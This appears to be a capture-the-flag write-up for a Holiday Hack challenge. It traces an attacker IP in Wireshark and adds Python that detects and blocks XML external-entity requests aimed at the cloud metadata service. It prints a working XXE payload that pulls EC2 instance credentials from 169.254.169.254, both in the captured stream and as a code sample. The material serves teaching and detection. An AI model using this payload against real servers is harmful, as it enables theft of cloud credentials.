Use the artifacts from Alabaster Snowball to analyze this attack on the Boria mines. Most of the traffic to this site is nice, but one IP address is being naughty! Which is it? Visit Sparkle Redberry in the Web Ring for hints.
Let's open up Wireshark again. We know the source must be IP 18.222.86.32 (seen in earlier challenges), and AWS IMDS lookups go to the special link-local address 169.254.169.254, so we build the following display filter:
ip.src_host == "18.222.86.32" and tcp.reassembled.data contains "169.254.169.254"
We select the last entry and right-click -> Follow -> HTTP Stream:
POST /proc HTTP/1.1
Host: www.toteslegit.us
...
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY id SYSTEM "http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"> ]>
<product><productId>&id;</productId></product>
HTTP/1.1 200 OK
So the URL fetched is http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance. The request is an XXE payload: the DOCTYPE declares an external entity pointing at the instance metadata service, and expanding &id; inside productId makes the server fetch the EC2 instance credentials on the attacker's behalf.
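As an added example (not part of the original write-up), the following Python does in code what the Wireshark filter and Follow Stream did by hand: it scans captured POST bodies for external entity declarations whose URL resolves to the instance metadata service, reports which source IPs sent them, and shows how a server can refuse such documents before parsing. The request records are constructed samples; only the attacker IP and the IMDS URL come from the capture above. The IPv6 metadata address fd00:ec2::254 is AWS's documented IMDS endpoint and is included as a generalization beyond the page.

```python
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional, Set, Tuple
from urllib.parse import urlparse

# Metadata service addresses that must never appear in user-supplied XML.
# 169.254.169.254 is from the capture; fd00:ec2::254 is AWS IMDS over IPv6.
IMDS_HOSTS = {"169.254.169.254", "fd00:ec2::254"}

# Matches general (<!ENTITY name SYSTEM "uri">) and parameter (<!ENTITY % name ...>)
# entity declarations that reference an external URI.
_ENTITY_RE = re.compile(
    r"""<!ENTITY\s+(?:%\s+)?[^\s>]+\s+(?:SYSTEM\s+|PUBLIC\s+["'][^"']*["']\s+)["']([^"']+)["']""",
    re.IGNORECASE,
)
_DOCTYPE_RE = re.compile(r"<!DOCTYPE", re.IGNORECASE)


def external_entity_urls(body: str) -> List[str]:
    """Return every external entity URI declared in an XML body."""
    return _ENTITY_RE.findall(body)


def targets_imds(url: str) -> bool:
    """True if the URI's host is a cloud metadata endpoint."""
    host = urlparse(url).hostname
    return host is not None and host.lower() in IMDS_HOSTS


def is_xxe_to_imds(body: str) -> bool:
    """Detection rule: an external entity that points at IMDS is an SSRF-via-XXE attempt."""
    return any(targets_imds(u) for u in external_entity_urls(body))


def naughty_sources(requests: List[Tuple[str, str]]) -> Set[str]:
    """Given (src_ip, request_body) records, return the IPs that sent IMDS-targeting XXE."""
    return {src for src, body in requests if is_xxe_to_imds(body)}


def parse_product_safely(body: str) -> Optional[str]:
    """Server-side hardening: reject any document carrying a DOCTYPE (and thus any
    entity declarations) before it reaches the parser; otherwise return productId."""
    if _DOCTYPE_RE.search(body) or _ENTITY_RE.search(body):
        return None  # refused: inline DTDs are not needed for this schema
    root = ET.fromstring(body)
    return root.findtext("productId")


# Constructed sample traffic. The payload mirrors the captured request; the other
# bodies and source IPs are made up to stand in for the "nice" traffic.
XXE_BODY = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<!DOCTYPE foo [ <!ENTITY id SYSTEM "http://169.254.169.254/latest/meta-data/'
    'identity-credentials/ec2/security-credentials/ec2-instance"> ]>\n'
    "<product><productId>&id;</productId></product>"
)
BENIGN_BODY = '<?xml version="1.0"?><product><productId>12345</productId></product>'
HARMLESS_DTD_BODY = (
    '<!DOCTYPE product [ <!ENTITY site SYSTEM "http://www.example.com/x.dtd"> ]>'
    "<product><productId>&site;</productId></product>"
)

SAMPLE_REQUESTS: List[Tuple[str, str]] = [
    ("10.0.0.5", BENIGN_BODY),
    ("10.0.0.9", BENIGN_BODY),
    ("18.222.86.32", XXE_BODY),
    ("10.0.0.7", HARMLESS_DTD_BODY),  # external entity, but not aimed at IMDS
]


def summarize(requests: List[Tuple[str, str]]) -> Dict[str, int]:
    """Count IMDS-targeting XXE requests per source IP (zero entries omitted)."""
    counts: Dict[str, int] = {}
    for src, body in requests:
        if is_xxe_to_imds(body):
            counts[src] = counts.get(src, 0) + 1
    return counts


if __name__ == "__main__":
    print("naughty sources:", naughty_sources(SAMPLE_REQUESTS))
    print("per-IP counts:", summarize(SAMPLE_REQUESTS))
    print("safe parse of benign body:", parse_product_safely(BENIGN_BODY))
    print("safe parse of XXE body:", parse_product_safely(XXE_BODY))
```

The detection side flags only entities whose host is a metadata address, so a request that merely carries a DTD (like the constructed 10.0.0.7 record) is not reported as the attacker; the hardening side is stricter and refuses every DOCTYPE, because a product upload has no legitimate reason to declare entities at all.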
We get the following hints:
The locks take input, render some type of image, and process on the back end to unlock. To start, take a good look at the source HTML/JavaScript.
Understanding how Content-Security-Policy works can help with this challenge.
Developers use both client- and server-side input validation to keep out naughty input.